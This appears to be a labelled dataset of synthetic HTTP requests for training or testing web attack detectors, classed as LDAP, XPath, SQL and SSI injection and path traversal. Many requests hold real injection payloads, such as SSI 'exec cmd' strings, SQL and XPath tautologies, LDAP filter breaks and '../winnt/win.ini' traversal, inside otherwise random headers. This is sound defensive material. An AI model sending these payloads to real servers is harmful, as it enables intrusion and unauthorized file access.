TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: eztnshjmmt
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: 7.4 207.240.198.26
Transfer-Encoding: identity
Upgrade: cei/0.7
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 240.93.48.210
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47070
Start - Id: 37837
class: LdapInjection
GET /rczaJeen/iorns6hsajsnidu/aKkss/koxAw8nj5pXdoxiblXrC/@p/avobjectL78U3hBCZL/@.QTXinputl/neenawpnedip/icoNatanEis/rteUsmem/8Aawo8LiA3-qq.css?me8vIewDaubfgo=925&xeR3rsswTtmtm=jTotelwhEsnieoo3&arN=386585&eoaz4=h3pcZ6&ZwLLn=8088087&a5=sU1XaDvL8&zFe2kb.Ga8=oe&Coblhha=sshshuiH%3Fqam+&o8drzyn=ned%3Ewinntelib%249o9d+u3rn2&CEaa=wgetdn&crvZt5TOAWph=12755&end6s=%29+%28%7C+++%28sei%3Deitmw*%29&n7=IEdltH5ahoemi HTTP/1.0
Host: 23.66.115.145
Connection: ero5aea
Accept: image/jpeg, image/jpeg
Accept-Charset: x-mac-arabic;q=0.0, iso-8859-8, x-mac-ce;q=0.1, windows-874
Accept-Encoding: 
Accept-Language: ne8e-oahrcbsa;q=0.9, i-ohfa;q=0.7, pkon-HmUEe;q=0.4, clR-2J
Cache-Control: cso='ul9oe'
Client-ip: 145.59.192.187
Cookie: o3iasEe=slUW1Uqb@;lwoooizhhkoUnud=16018264;tmssQrt=script<oqa e<iaoiowinntvetp
Cookie2: $Version="4"
Date: Tue, 30 Mar 04 06:43:21 CET
ETag: "v.u7W79d5gfnlTy"
Expect: lw1usH=epexaq
From: tlocso@Staohr.gov
If-Modified-Since: Thu, 22 Apr 04 01:32:46 UTC
If-Unmodified-Since: Mon, 01 Oct 07 17:16:32 UTC
If-Match: "6LDVJKbY8NZaxk.pXUk"
If-None-Match: "__vM8@93Slw96AX_m9"
If-Range: "G..oIsvFTps4g1nGtpp"
Max-Forwards: 6437
MIME-Version: 1.8
Pragma: tylayyth='anqaxab'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: NTLM cGVvZ3RzdGl0dWh0ZTJjbkFudGhpVTAxdHI5c3NuaWlsYW1iZTRpQXUxb3VtenM=
Range: 853418-,-430
Referer: /gapsi4Pn/EniOhob.nsf
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: dX1r8c (ew2O0cr-w; fdNrOZZq; o6S22bE)
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 707x739
Via: 8.6 www.npir.png:39, 9.9 www.nwee.jpg
Transfer-Encoding: foctbw
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37837
Start - Id: 49334
class: XPathInjection
GET /td6.cgi?6replacer4fPu=8cebjt&lEkstcoCImiur=detdjlpt%27++++or++1%3C+++++tnre%2FOrnatT%2F65utr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D30%5D+or+%27telc%27++++%3D+++%27&YnodeprlkKpshutdownT=fr8&tem6mag=alo0iolpmesfot&90ir6.p=88&gcooanh1=29981&amrednenkjf6Dsa=ePAtWgI9S2M&ioqiRlIuLffdr3=s57d&mwhagnxaWze=tXN HTTP/1.0
Host: www.ierhee.uk:80
Connection: Netcd
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=503
Client-ip: 23.148.126.23
Cookie: 3jrr=netcatNanp=m9o;annPheeOgrtaS=0;I2motmed0whxe=2978958476;RAnDz=ro;4gQt=iEdrhc;v8tL_9hPTOb0=wotaO
Cookie2: $Version="889"
Date: Sun, 10 Jan 10 20:58:28 UTC
ETag: W/"FV.LajZ9oyTbHsHCIym"
Expect: Ialo
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Sat, 29 Jul 06 05:34:04 CET
If-Match: "phToetSZ_LdvIxXA"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: "eY3sf-2Y.5AmHnm"
Max-Forwards: 76
MIME-Version: 6.3
Pragma: aeo9ae8=apectph
Proxy-Authorization: Basic cnFoZThhZXk6b2R1ZHB5ZQ==
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /eBol/fttq/se3icleh.mdb
TE: trailers,gzip
Trailer: From
User-Agent: Mozilla/4.1 (compatible; MSIE 8.0; Open BSD i386; 6niauci; hnWh)
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: HTTP/2.2 www.beewh.jpeg:6574, HTTP/1.3 www.so3uh.jpeg
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49334
Start - Id: 40198
class: SSI
GET /r.K/xnqXax/EeaeaIemntpo/tLteyeesfoierfho86w.tiff?tbhiE0esEecea8=08558&JrDDxtermBt=nHJNLUO&OGBiLmo=%3C%21+++++%23%3C%21--+++++%23exec+++cmd%3D%22id%22--%3E&VoZA=5&vpsmNeoeNhqbn=Q+saat%28&hgah=rcato&0.wP=3450427 HTTP/1.0
Host: www.lRegriot7.ch
Connection: 2khrjeL
Accept: image/*, application/*, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.3, compress
Accept-Language: o8wiqii-Csil
Cache-Control: max-stale=3076
Client-ip: 45.35.47.136
Cookie2: $Version="9"
ETag: "1wBpnAmz05uYK.V5M51"
If-None-Match: *
Authorization: NTLM b3FkOGVDY2xjaDllOHR1cnJOaXV0Z2xubnVyajI4ZTVhem0=
Referer: /teeeoa/axtgt.bin
User-Agent: Mozilla/6.9 (Windows; U; Win98 9.6; hm-Ot; rv:6.3.1) Gecko/05168531

null

End - Id: 40198
Start - Id: 42773
class: SqlInjection
POST /BsH6geadae5i/aVale.3@UyJeCf/rIz118X7imnJ54h9Q/ixhokwes7p7eatcsel/dbehoLplS16/i1C0c2w9p9JnVnuc@ah/tsLpoyInr9nneeseaier/r93ChSSRLHvR3z69T./cE/tlopte/urajtnloeoldisoc/hx_c_f9O28J-e7r6d.htm? HTTP/1.1
Content-Length: 77
Content-Language: etdntoN,t,hd
Content-Encoding: gzip
Content-Location: http://www.rhsyo.ch/4dTae.aspx
Content-MD5: ajNmcjB0YXNtZTZzNGJqZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Jan 09 09:21:12 CET
Last-Modified: Fri, 11 Nov 05 18:44:37 GMT
Host: 100.141.51.163
Connection: inTyu1oa
Accept: video/*;q=0.6
Accept-Charset: isiri-3342, iso-8859-2;q=0.6, iso-10646-ucs-2;q=0.5
Accept-Encoding: gzip;q=0.5, compress, identity;q=0.3
Accept-Language: los-0sijtal8;q=0.5, erR-tarnmuc
Cache-Control: no-transform
Client-ip: 48.186.187.130
Cookie: wigl=902;4KJwuH='     or  id in ( select *     from    user_db   )
Cookie2: $Version="74"
Date: Thu, 24 May 07 15:49:30 GMT
ETag: "WF4A4@FXbzWEO3h-"
Expect: dpiit9td
If-Modified-Since: Wed, 21 Jan 04 21:04:35 CET
If-Unmodified-Since: Thu, 24 Mar 05 22:21:21 GMT
If-Match: *
If-None-Match: "K-IU9GQHmG9Mlwrf"
If-Range: "zuMpsrhycN9KwOzR9r32"
Max-Forwards: 31
MIME-Version: 5.1
Pragma: aix0wrs='d4Ii'
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic a3RzbTpzN2V5bQ==
Range: 169067-0
Referer: http://www.3dea909e.cz/rctqn.cgi
TE: trailers
Trailer: Authorization
User-Agent: pii7ncey6i (eQV6wjGHG; k@@1WJw5M; lMPAxEJI; aJk.suVbm)
UA-CPU: PowerPC
UA-OS: FreeBSD
Via: 5.0 www.c9hhu.tiff, 9.2 53.121.42.217, 8.5 134.106.105.31
Transfer-Encoding: gzip
Upgrade: avqW/1.7, 8id3nt/8.2, ybt/0.5, a8nes/6.6
X-Serial-Number: 58260161
----: ----------------------------

gn=inopen|bodybuxB&catXeCRandj=ytntdfhamr&uzttboxemMifie=c&mauoht=320660873

End - Id: 42773
Start - Id: 48903
class: XPathInjection
GET /passwdEQ-cmd3/haWkCkj4.r-bNBTi.bin?r54ltpva4mTtA=i4Rx-r2Sf&oyezh=osenm12eeiuOlxycs&wnPsRo57g=613829&nn2uit1S7=n0eruecfeiheOeept&atnhgec0rWebRa=rys6s55eyoeii&Wreplace3SFaFR7uec=n4WElMQh.Dn&OolmtId2gyEn=d&Eisc2retnttsl6t=c9nynyo&nahthdeu0sn=1+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++33642%3D&Nlnr1=hrzanh%24fe&tie=u7FSuVWP&TBFp2gC@E=dmQ_6F&m6uhz=iaasntastbybsdrVw&ekih=execrsystemr HTTP/1.1
Host: 208.59.174.251
Connection: xpsca
Accept: text/*;q=0.1, video/*;q=0.4, text/plain;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: identity, compress, deflate, compress;q=0.4, deflate
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 182.56.240.6
Cookie: rae=enLnode;tnr0aigtaetxcLe=7182;anfdtheL7A='t ;BcbSOlre4roS4i=2900
Cookie2: $Version="0"
Date: Fri, 12 Nov 04 15:03:17 CET
ETag: "WYNhh.HkA-GnzCFmx"
Expect: i5f1t
From: nui8@hgERemx.net
If-Modified-Since: Sat, 03 Jun 06 15:17:23 GMT
If-Unmodified-Since: Tue, 10 Feb 04 12:13:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: http://www.etsg2.net/deoe.jpeg
TE: gzip;q=0.7
Trailer: Warning
User-Agent: Mozilla/8.5 (compatible; Konqueror/3.5; Win98; EIs3raer; nsq6o)
UA-CPU: MIPS
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 978x515
Via: 4.0 www.run6uEoh.html, 6.0 225.8.95.174, 6.6 220.88.128.160
Transfer-Encoding: compress
Upgrade: o6r/8.3, gsh/9.3, o8o/3.8, 2oIojh/2.5
Warning: 185 174.40.170.99 "ego4zshYd2gmrnamlRoy" "Tue, 24 May 05 01:20:13 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 58510218762
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48903
Start - Id: 45713
class: PathTransversal
GET /uAe/EthAeo5sc/mk5pefuebnb.mdb?egTOm=6ahfHrcyeJcait&ClvzVreplaceformtbm0p=..........................WINNTsystem.ini&nturatcha=crsSmphpsd HTTP/1.0
Host: 246.197.192.133
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.0, iso-8859-3;q=0.6, x-mac-arabic, x-mac-icelandic
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: Visfe=iosuUe
Client-ip: 244.124.85.82
Cookie: daddT=t\huoor;intrnsiorr5=mtirhtaccesob)ne;N6ehaniieaetl=ieew;h6hctrdEethcuyn=ormeoiodz6ui;Z6ui3rLO5Yt=%;h3ea=nEo tEs7Ril&lccand6t
Cookie2: $Version="0"
Date: Mon, 19 Oct 09 05:10:08 GMT
ETag: "W2cyccIkLZi2-vmxGbfE"
Expect: esf5d5=o26ss;rpg2hNxt=sn9g
From: gAo4ot1@1soairea.gov
If-Modified-Since: Thu, 10 Nov 05 18:55:36 UTC
If-Unmodified-Since: Tue, 22 May 07 05:53:57 CET
If-Match: "_O2__yriN3AkuCtSwCg"
If-None-Match: "Sryf3TrOn4Yq.m5K"
If-Range: "yAiKVCoL_cUrrhszV"
Max-Forwards: 2070
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: rnan tnibtYet=hO7phof
Range: 20-
Referer: /xrtez/ha5nse4/9hdabtl.gz
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.1 (X11; U; Solaris 1.2; h5-5h; rv:5.9.6) Gecko/11562841
UA-CPU: x86
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: FTP/1.3 www.sfprl.css, 2.9 19.72.15.220, 7.2 www.ioih.gif
Transfer-Encoding: 0tlo
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 139.27.168.135
X-Serial-Number: 1618317
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45713
Start - Id: 45076
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: www.tHadio.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-7, x-mac-roman;q=0.6, windows-1253, x-mac-korean;q=0.5, iso-8859-1
Accept-Encoding: 
Accept-Language: I-waak
Cache-Control: no-store
Client-ip: 101.182.197.221
Cookie: Sand@uBstyle=602505
Cookie2: $Version="785"
Date: Fri, 17 Sep 04 10:04:10 CET
ETag: "0GbJoMCi@JTjqEsBGN"
Expect: 100-continue
From: 8gV2@oyweendsp.ch
If-Modified-Since: Mon, 14 Nov 05 03:21:58 GMT
If-Unmodified-Since: Tue, 14 Apr 09 19:07:45 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 3885
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM bnJuemVma25tY3JTcm5abm1lb3RoYXRlbm5pZm9yb25sMkU=
Range: 51016-,-10087
Referer: /edueafr/dpri/np9olrsi/0ihCl5ke/0anhere0.css
TE: gzip
Trailer: Range
User-Agent: tesb (mwU7KGLe; tWEwo7p1; b9.oXG)
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 088x7672
Via: FTP/1.6 www.oe8rT.html:773
Transfer-Encoding: compress
Upgrade: nadi/5.9, zccv3/4.5, 3E2ei/5.6
Warning: 634 220.181.199.153 "EI6etnt" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45076
Start - Id: 49139
class: XPathInjection
GET /o12/hA/ssnsueauuno/s8Oe7nl5iD/eOQumUXYKV90AuNfXu/iR/oB_QkZ/ErmF1mK9logb/dSf9htaccesD.shtml?st=s5K3KK&san=06960++++or++++h%2Fse%2FsKcrg%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D7%5D++or+++++838%3D&RTyLOR=2002&ytioy=bbwkkf6HJF&4r2xtermYgg=usrpxtermeZe&wrnwilt=Rvnuw3eceahlxea&ee0wnoikhoefea=1pa%24jn%3Detacceptr+kmcsied&odtisIncao=objecte%3F&ejirs9hdRwonge=orie&lmlhan8rse=897710&ss7pMtsuwCitm=541678&rp6Ie=hniopny3t7sotii&aDNn7-I12JVH=dtpn&MstiaAmhaT=461 HTTP/1.1
Host: 191.77.183.18:6
Connection: keep-alive
Accept: application/x-tar, text/*;q=0.9, image/*;q=0.8
Accept-Charset: us-ascii;q=0.0, iso-8859-15;q=0.9, iso-8859-2, big5
Accept-Encoding: deflate, gzip;q=0.8, deflate
Accept-Language: *
Cache-Control: min-fresh=4763
Client-ip: 97.222.173.73
Cookie: esedaRrGsrLeT=leee7|hrrc;40i=n;mltyFusraiscript9i
Cookie2: $Version="860"
Date: Thu, 29 Sep 05 08:16:11 UTC
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: hstr@4dfys6.de
If-Modified-Since: Fri, 01 Oct 04 23:08:06 CET
If-Unmodified-Since: Wed, 11 Feb 04 12:12:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM aXBhOWVraXQxZXJkckVhZXgwVE5hQXhwc3RzbHJ0b2VsZnN0b25jZWFv
Authorization: Digest cnonce="eoetai"
Range: 6-
Referer: http://www.itdNarYs.ch/ner3dnas/IpaZ5iut/Olmsclco.php3
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 9.3; tT-bu; rv:8.6.2) Gecko/13503755
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: HTTP/3.3 130.157.114.54, 4.7 www.eou5naU5.tiff:5411, 5.4 www.etneprt.tiff
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49139
Start - Id: 40289
class: SSI
GET /vSzJ2m_Nr6C/eCoUF/-h-p0LLVsh6aM/pfOmcYEN8QUU.C.cy@/TdDn5s9kspyiWeRn/dadq9tcg6/aa64htSnlaqnTn/ratPagiteicB3sTioaT/i964._6u/woi7h/i-MDwj29Pld.exe?rictzncavti=008&swL=spThrrsah&orngdirsvtyrm=imosueearkiahe0hhw&sOcfeEptn=%3C%21--+%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Ct55idrmse%5Ce2tPzsi5%5Cbhur9.exe+d%3A%5Cnhgess%5Cwww.siel.org%5Cjragl%5Cdatabase.mdb+++++%2Fx+++++exporttofoxpro%22--%3E&rmcbNeex=46609 HTTP/1.0
Host: 218.193.2.241
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, identity;q=0.6
Accept-Language: o-ronp;q=0.3, n-s5b, jb69n-twGt;q=0.8, oao6eeee-auipaooa;q=0.4
Cache-Control: 9='en'
Client-ip: 233.182.232.153
Cookie: sv=35947383;zeisensisir=yuace7mfhuct4dbst1;hgaisieEcqsl=1755;dtgtWCmt=jNdmgEvp;1er9=senaiacrr6tf;tfnrttthinrt=hsamenwfromaTbetweenOepyon 
Cookie2: $Version="08"
Date: Fri, 29 Dec 06 10:33:16 CET
ETag: W/"6UQZElw9NjdLFMLemIB"
Expect: inxntws
From: sinl@n3biht.ch
If-Modified-Since: Thu, 19 Nov 09 21:58:09 GMT
If-Unmodified-Since: Tue, 28 Dec 04 19:03:02 UTC
If-Match: "E8x_9Q8Z9rXm54vL0JCf"
If-None-Match: *
If-Range: *
Max-Forwards: 7867
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bzZlZ3Bvbm0xdHRoaWZHYWFjaWVtYTZsb2VxYm13d0R0OWVwb2ZpT2Ju
Authorization: Basic aElPcm5rbzpmZjVraA==
Range: 37574-,839789-
Referer: http://www.cGTb.ch/trye/nheTeot/wttamI.ace
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/6.2 (compatible; s4yxazatsr; Linux i586; rhcwacEhi6; ttar88Yqgo; vn4aec5dKl)
UA-CPU: MIPS
UA-Disp: 182,511,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: compress
Upgrade: rdr/9.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40289
Start - Id: 38506
class: LdapInjection
GET /Hfbxeidoai/oex8vLh/aXQ/uN9.9u/n-uqBzVjWTKqF/r5EgDyW4/p8eETYLXpLCq9J/d4E-a0idar9/iaaigpvhhfgoeb9/sD7oHkZKVVff0FndGKs/Xp.FNEJJ7/taidcdipxzIaIaki.mspx?7sgx2Tsdeercp=r%3A%24e%5C&gizo6=aliahbedw&rois5GDetdhh=1841933&y2qtj8g=oe%29%28+%7C++++%28soEE%3D*%29&eg1iixedq6ctOhc=4385&athai3euocgLa=25810 HTTP/1.1
Host: www.eehevaht.gov
Connection: close
Accept: image/jpeg, text/html
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.0, gzip, compress
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 150.1.113.3
Cookie: mnpatpbrpry19h=1
Cookie2: $Version="388"
Date: Sat, 05 Aug 06 15:43:32 GMT
ETag: "zquZ.85zU@b08iEVA7ZH"
Expect: 100-continue
From: ufiseea@gios.org
If-Modified-Since: Mon, 17 Dec 07 05:10:16 UTC
If-Unmodified-Since: Sat, 01 Aug 09 22:38:42 GMT
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "NFfENmEb00JDlZZI-cj"
If-Range: Tue, 14 Nov 06 03:17:46 GMT
Max-Forwards: 45
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM YWd0eWlmbThlRWpub3JzY2xkbnhlRXRyZWVqeTJhbjd0MG4=
Range: -087,245-62681,-648438
Referer: http://www.ihygKnN.de/srptT/6erAa4/sGzmiv/6Ezit.asp
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 2.3; en-ES; rv:8.9.3) Gecko/13162188
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: 9.6 www.ctruiu.jpg, FTP/8.8 www.eqS5.htm, 6.1 www.prfes.jpg:60
Transfer-Encoding: deflate
Upgrade: depz/4.8, sndttt/4.3
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 134.223.187.109
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38506
Start - Id: 49245
class: XPathInjection
GET /ouspgehrOtnttasets/-rAeFKQJ9fromRc_/G3h7KoR9Ixtermdg/rb3E86Sf8T/2zSO7._7R7.Tw_uwpPR/accnnroera/tHay/et6/nrqe/yGpc.cgi?Fio3n=gof%27%5D+++++%7C+P+++%7C+%2F%2Fuser%5B++++name%2Ftext%28+++%29%3D++++%27sed&0e2hiel3o1nu0=4366&1Am=5..&lcbi5aetfgeilst=599&XqelIpf=d%2B0G&hSR2h=saieta&ecN=tpObSu3pfB&ebh=lbL0_VrqpaS&eaige2ypeyams=oiF4h7tJiy&hIdhiedeutd7us=4 HTTP/1.0
Host: 100.25.66.106
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 247.83.20.197
Cookie: sVAe=73;os=oqdgw ajriwhere
Cookie2: $Version="1"
Date: Wed, 05 Apr 06 21:43:16 CET
ETag: "k0tNy17@VGo1UDQzY0"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Mon, 13 Aug 07 20:38:37 GMT
If-Unmodified-Since: Thu, 02 Dec 04 01:58:00 GMT
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Tue, 04 Mar 08 12:27:06 UTC
Max-Forwards: 5
MIME-Version: 9.4
Pragma: s3='glni'
Proxy-Authorization: Digest realm
Authorization: Basic ZTNhdHg6cGRlYmVsdTM=
Range: -364650
Referer: /Pntme/Fnplrt/j2tf0o6i.jpg
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: Mozilla/8.9 (Machintosh; U; PPC 2.5; me-st; rv:4.5.5) Gecko/87269332
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 4.5 8.224.35.56, 0.5 www.f4Aa.css
Transfer-Encoding: gzip
Upgrade: ja8xa/5.6
Warning: 272 www.ineutIx.jpg:5 "asndsepgt" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49245
Start - Id: 37651
class: LdapInjection
PUT /ntn_GWq6dgrXk/q3AeFqgtyKi/tnyezmrr/ebYTQB3jwosSXSCX.sh? HTTP/1.0
Content-Length: 173
Content-Language: dpc,siec1,w3pt
Content-Encoding: gzip
Content-Location: http://www.Ttihoe71.uk/ttwp5ai/i0ieaeb7/dhteaO/liW2dgjt.txt
Content-MD5: ZTV4cHNoNWN1aGNpbUN0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 19:15:57 UTC
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: www.ri4dassHa.com
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: isiri-3342;q=0.7, euc-jp;q=0.3, x-mac-arabic;q=0.3, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: ncdstPZ='SE'
Client-ip: 91.65.159.176
Cookie: 7l=51244;rets=a0havingv6evalEn/u
Cookie2: $Version="878"
Date: Sat, 18 Mar 06 17:37:17 GMT
ETag: "2Owh1m2iJKJpAV1Rt"
Expect: 100-continue
From: EEnaeq3@weaSbmldq.fr
If-Modified-Since: Thu, 04 Dec 08 09:04:30 GMT
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: *
If-Range: Tue, 03 May 05 01:05:43 GMT
Max-Forwards: 900
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /0o1dacf2/eaivl/oM9yuoO4/0iadald9.shtml
TE: chunked
Trailer: TE
User-Agent: hsai/3.4
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 940x1719
Via: 6.3 www.ixees.html
Transfer-Encoding: As0i; doas=foma
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5o=791&1ijzannistIe=")(targetfilter=(o=NetscapeRoot))&srtAerota=aisko3tai3<&Ov2FV5oAGal=sLdspsto&-orRG7rcp=iFDK&V9kl=n47b0sfsate&mmpyunion4http@9e=49760607

End - Id: 37651
Start - Id: 38676
class: LdapInjection
GET /3SvdI8P_.tiff?RzdWUAOdrop=%29+%28++++%7C++%28displayName%3Dhad*%29+++%28name++++%3D++++had*+%29%28++++mail%3Dhad*++%29&2nhR116d=6365168 HTTP/1.0
Host: www.rioei27hT.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 64.190.230.209
Cookie: 3rwe13tcdnne=f6e;eiud8Npiwg510=29596;PSVkSZdropyqp=oKApv;H0J8n7E=07813;sAnfE=wRidP
Cookie2: $Version="9"
Date: Fri, 12 Oct 07 05:59:06 GMT
ETag: W/"zJOOArlYXSlq3FpaJBQS"
Expect: 100-continue
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 06 Mar 05 05:02:56 CET
If-Unmodified-Since: Wed, 02 Aug 06 12:04:44 CET
If-Match: *
If-None-Match: "t1BpX@2ZoM.g3rkLIR0"
If-Range: *
Max-Forwards: 2608
MIME-Version: 5.2
Pragma: rehfi5='bn'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic OUh0cmJGOlVhOWFF
Range: 39622-,-9614,-81153
Referer: /ekf7byIe/cCtwtsOe.css
